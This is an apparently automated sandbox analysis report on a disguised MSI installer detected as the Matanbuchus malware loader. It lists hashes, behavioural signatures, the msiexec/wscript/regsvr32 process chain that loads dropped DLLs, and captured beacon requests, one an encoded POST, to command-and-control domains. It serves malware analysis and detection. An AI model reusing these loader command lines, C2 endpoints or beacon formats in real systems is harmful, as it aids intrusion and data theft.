Edit tour

Windows Analysis Report
SCAN-068589.pdf.msi

Overview

General Information

Sample Name:	SCAN-068589.pdf.msi
Analysis ID:	647225
MD5:	c0ee31bc6536ae8cb7e5d8809676920a
SHA1:	b21482d1072e5cb65488f2c181f38c75d8c80dcd
SHA256:	2d8740ea16e9457a358ebea73ad377ff75f7aa9bdf748f0d801f5a261977eda4
Tags:	msi
Infos:

Detection

Matanbuchus

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Matanbuchus

System process connects to network (likely due to code injection or exploit)

Uses known network protocols on non-standard ports

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Stores large binary data to the registry

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to check if a connection to the internet is available

Drops files with a non-matching file extension (content does not match file extension)

Adds / modifies Windows certificates

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Registers a DLL

PE / OLE file has an invalid certificate

Launches processes in debugging mode, may be used to hinder debugging

Checks for available system drives (often done to infect USB drives)

Dropped file seen in connection with other malware

Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 6420 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\SCAN-068589.pdf.msi" MD5: 4767B71A318E201188A0D0A420C8B608)

msiexec.exe (PID: 6480 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)

wscript.exe (PID: 6728 cmdline: wscript.exe C:\Users\user\AppData\Local\AdobeFontPack\notify.vbs MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

regsvr32.exe (PID: 6736 cmdline: regsvr32.exe -n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 6764 cmdline: -n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

regsvr32.exe (PID: 7032 cmdline: C:\Windows\system32\regsvr32.exe -n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls" MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 4088 cmdline: -n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls" MD5: 426E7499F6A7346F0410DEAD0805586B)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\AdobeFontPack\main.dll	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
C:\Users\user\AppData\Local\x86\5507.nls	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
23.2.regsvr32.exe.6da90000.0.unpack	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security

HTTP traffic detected: POST /cAUtfkUDaptk/ZRSeiy/requets/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16)Host: collectiontelemetrysystem.comContent-Length: 587Content-Type: application/x-www-form-urlencodedAccept-Language: en-RUSData Raw: 65 76 3d 65 79 49 7a 51 30 56 72 49 6a 6f 69 4d 48 68 78 51 55 5a 4d 64 6b 52 79 52 56 4e 59 64 33 4e 50 64 7a 51 77 52 33 42 6e 62 45 55 31 51 30 51 79 4f 58 70 4f 56 30 64 69 54 30 31 4d 54 31 4e 52 4d 58 64 4c 53 6e 42 6c 59 79 74 4d 53 58 67 77 50 53 49 73 49 6a 4e 6d 5a 54 45 78 49 6a 6f 69 62 32 74 59 54 6c 46 42 50 54 30 69 4c 43 49 7a 62 54 64 34 49 6a 6f 69 4d 6e 68 44 57 6b 64 4d 61 7a 30 69 4c 43 4a 45 55 7a 4a 34 49 6a 6f 69 63 6b 56 45 56 55 30 33 4e 6d 59 69 4c 43 4a 46 54 47 6f 69 4f 69 49 7a 61 6c 63 32 55 57 56 4e 50 53 49 73 49 6b 56 76 4e 69 49 36 49 6a 4a 34 54 30 64 48 54 45 74 49 49 69 77 69 52 6e 52 76 49 6a 6f 69 63 6d 63 39 50 53 49 73 49 6b 78 76 63 79 49 36 57 79 49 76 51 58 6c 46 52 6e 41 79 51 6e 52 70 4e 33 64 34 59 31 64 7a 4e 6c 59 79 54 57 31 33 53 6b 46 56 56 54 4e 56 63 6d 39 50 52 45 6c 4a 56 6e 70 6b 51 54 6c 48 64 6e 56 4e 54 6b 6c 6e 50 54 30 69 58 53 77 69 54 6c 4e 6c 65 55 52 59 49 6a 6f 69 4d 55 4e 6c 55 6b 4e 4b 54 33 6f 69 4c 43 4a 52 4e 6c 67 32 49 6a 6f 69 4d 32 70 48 62 6b 39 76 54 32 74 79 61 30 4e 42 63 30 70 78 56 33 4e 57 4e 30 30 69 4c 43 4a 57 65 69 49 36 49 6a 4a 56 4e 6d 39 4b 63 6a 5a 47 62 57 64 4d 51 54 68 32 51 31 49 76 65 48 46 78 5a 30 4d 34 4f 55 68 44 53 32 59 76 53 6b 78 45 54 45 74 46 53 55 73 77 63 48 64 70 64 57 73 39 49 69 77 69 59 30 4a 47 49 6a 6f 69 4d 33 70 6d 57 6b 34 72 55 45 64 32 51 79 74 68 64 56 70 79 64 6e 52 44 4d 31 46 70 61 6e 63 39 49 69 77 69 5a 6a 46 6b 59 53 49 36 49 6e 68 70 61 58 64 4f 53 56 4e 6e 63 57 6c 4d 62 6e 4a 4b 64 6e 70 7a 52 44 4e 4c 4b 30 56 72 50 53 49 73 49 6e 52 58 49 6a 6f 69 62 32 73 7a 54 6c 4a 50 54 46 6f 69 4c 43 4a 33 55 44 59 69 4f 69 49 33 52 56 68 68 55 6d 5a 75 59 69 49 73 49 6e 70 72 51 7a 63 69 4f 69 49 69 66 51 3d 3d Data Ascii: ev=eyIzQ0VrIjoiMHhxQUZMdkRyRVNYd3NPdzQwR3BnbEU1Q0QyOXpOV0diT01MT1NRMXdLSnBlYytMSXgwPSIsIjNmZTExIjoib2tYTlFBPT0iLCIzbTd4IjoiMnhDWkdMaz0iLCJEUzJ4IjoickVEVU03NmYiLCJFTGoiOiIzalc2UWVNPSIsIkVvNiI6IjJ4T0dHTEtIIiwiRnRvIjoicmc9PSIsIkxvcyI6WyIvQXlFRnAyQnRpN3d4Y1dzNlYyTW13SkFVVTNVcm9PRElJVnpkQTlHdnVNTklnPT0iXSwiTlNleURYIjoiMUNlUkNKT3oiLCJRNlg2IjoiM2pHbk9vT2tya0NBc0pxV3NWN00iLCJWeiI6IjJVNm9KcjZGbWdMQTh2Q1IveHFxZ0M4OUhDS2YvSkxETEtFSUswcHdpdWs9IiwiY0JGIjoiM3pmWk4rUEd2QythdVpydnRDM1Fpanc9IiwiZjFkYSI6InhpaXdOSVNncWlMbnJKdnpzRDNLK0VrPSIsInRXIjoib2szTlJPTFoiLCJ3UDYiOiI3RVhhUmZuYiIsInprQzciOiIifQ==

Source: unknown

DNS traffic detected: queries for: telemetrysystemcollection.com

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 23_2_6DA98300 InternetCheckConnectionA,InternetOpenUrlA,InternetReadFile,LocalAlloc,LocalFree,InternetCloseHandle,InternetCloseHandle,

Source: global traffic	HTTP traffic detected: GET /m8YYdu/mCQ2U9/auth.aspx HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16)Host: telemetrysystemcollection.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /m8YYdu/mCQ2U9/home.aspx HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16)Host: telemetrysystemcollection.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /m8YYdu/mCQ2U9/home.aspx HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16)Host: telemetrysystemcollection.comCache-Control: no-cache

Source: unknown	HTTPS traffic detected: 213.226.114.15:443 -> 192.168.2.3:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.226.114.15:443 -> 192.168.2.3:49900 version: TLS 1.2

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\6ecb59.msi

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\Installer\6ecb57.msi

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DAD85F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DADFDC5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DAE91DC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DAE90BC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DAD8C50
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DADE2BD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DAE62FA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA9AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DAE5E60

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: String function: 6DADADD0 appears 32 times

Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll

Source: SCAN-068589.pdf.msi

Static PE information: invalid certificate

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\AdobeFontPack\main.dll 60F030597C75F9DF0F7A494CB5432B600D41775CFE5CF13006C1448FA3A68D8D
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\x86\5507.nls F8CC2CF36E193774F13C9C5F23AB777496DCD7CA588F4F73B45A7A5FFA96145E

Source: C:\Windows\System32\msiexec.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\SCAN-068589.pdf.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeFontPack\notify.vbs
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeFontPack\notify.vbs
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls"

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Local\AdobeFontPack

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DF5D62286770078C98.TMP

Jump to behavior

Source: classification engine

Classification label: mal64.troj.evad.winMSI@11/22@70/2

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeFontPack\notify.vbs

Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Data Obfuscation

Yara detected Matanbuchus

Source: Yara match	File source: 23.2.regsvr32.exe.6da90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\AdobeFontPack\main.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\x86\5507.nls, type: DROPPED

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll

Source: C:\Windows\SysWOW64\regsvr32.exe

File created: C:\Users\user\AppData\Local\x86\5507.nls

Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe	File created: C:\Users\user\AppData\Local\x86\5507.nls			Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\AdobeFontPack\main.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49902
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49917

Source: C:\Windows\System32\msiexec.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOGPFAULTERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Windows\SysWOW64\regsvr32.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6768	Thread sleep time: -100000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6768	Thread sleep time: -50000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6768	Thread sleep count: 66 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6768	Thread sleep time: -5280000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5080	Thread sleep time: -100000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5080	Thread sleep time: -45000s >= -30000s

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 23_2_6DAE2F53 FindFirstFileExW,

Source: C:\Windows\SysWOW64\regsvr32.exe

Thread delayed: delay time: 80000

Source: C:\Windows\SysWOW64\regsvr32.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation

Source: regsvr32.exe, 00000006.00000003.409530244.0000000005596000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.409404852.0000000005506000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.435592379.00000000055E1000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.420827556.0000000005509000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.413548179.00000000055A3000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000017.00000003.506619594.0000000005151000.00000004.00000800.00020000.00000000.sdmp

